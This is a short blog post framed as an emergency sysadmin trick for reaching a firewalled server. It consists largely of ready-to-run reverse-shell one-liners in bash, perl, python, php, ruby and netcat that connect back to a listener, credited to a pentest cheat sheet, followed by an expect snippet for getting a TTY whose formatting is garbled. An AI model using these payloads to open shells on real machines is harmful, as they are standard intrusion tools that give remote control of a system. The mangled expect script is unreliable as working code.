Emergency reverse shell technique

18 Jun 2015 08:44 | security

Don’t you just hate it when an emergency happens with an important server and access from your location is firewalled? Luckily if there’s someone else local to the machine who can execute commands for you, getting onto it is fairly trivial.

First make sure that the machine you’re on can accept connections from the internet on a TCP port (any). Typically you’ll need to map this through on whatever firewall/router you’ve got on the local network.

Let’s say your ip address is 127.127.127.127 and you’ve mapped tcp port 13131. Simply listen on the port with netcat:

$ nc -l 13131

then have someone on the remote machine run any of these:

bash:

bash -i >& /dev/tcp/127.127.127.127/13131 0>&1

perl:

perl -e ‘use Socket;$i=”127.127.127.127”;$p=13131;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/bash -i”);};’

python:

python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“127.127.127.127”,13131));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/bash”,”-i”]);’

php:

php -r ‘$sock=fsockopen(“127.127.127.127”,13131);exec(“/bin/bash -i <&3 >&3 2>&3”);’

ruby:

ruby -rsocket -e’f=TCPSocket.open(“127.127.127.127”,13131).to_i;exec sprintf(“/bin/bash -i <&%d >&%d 2>&%d”,f,f,f)’

netcat:

nc -e /bin/bash 127.127.127.127 13131

and hey presto, your netcat listener is now connected to the shell. Of course the connection isn’t encrypted, so you’ll want to be careful what you type over it, but for emergency use it’s quite handy. The advantage over the obvious choice for this (ssh) is that you don’t have to give the person who’s at the server end any credentials to log into your machine with in order to set up the connection.

source: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

Update

One limitation of this is that you won’t have a tty, which makes many things impossile or difficult.

However if expect is installed you can get one by dropping this into a file and running it:

!/usr/bin/expect

Spawn a shell, then allow the user to interact with it. The new shell will

have a good enough TTY to run tools like ssh, su and login

spawn bash interact

then you have a full tty and can run sudo, su, screen etc :)

all posts

[year]
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
2015

[tag]
AWS
agile
apple
apple watch
aws
bash
cryptocurrency
development
email
exploits
iOS
iphone
linux
macOS
mining
mysql
php
ruby
scrum
security
synology
tailscale
touchID
vim
work

Mark Wadham

Emergency reverse shell technique

18 Jun 2015 08:44 | security

!/usr/bin/expect

Spawn a shell, then allow the user to interact with it. The new shell will

have a good enough TTY to run tools like ssh, su and login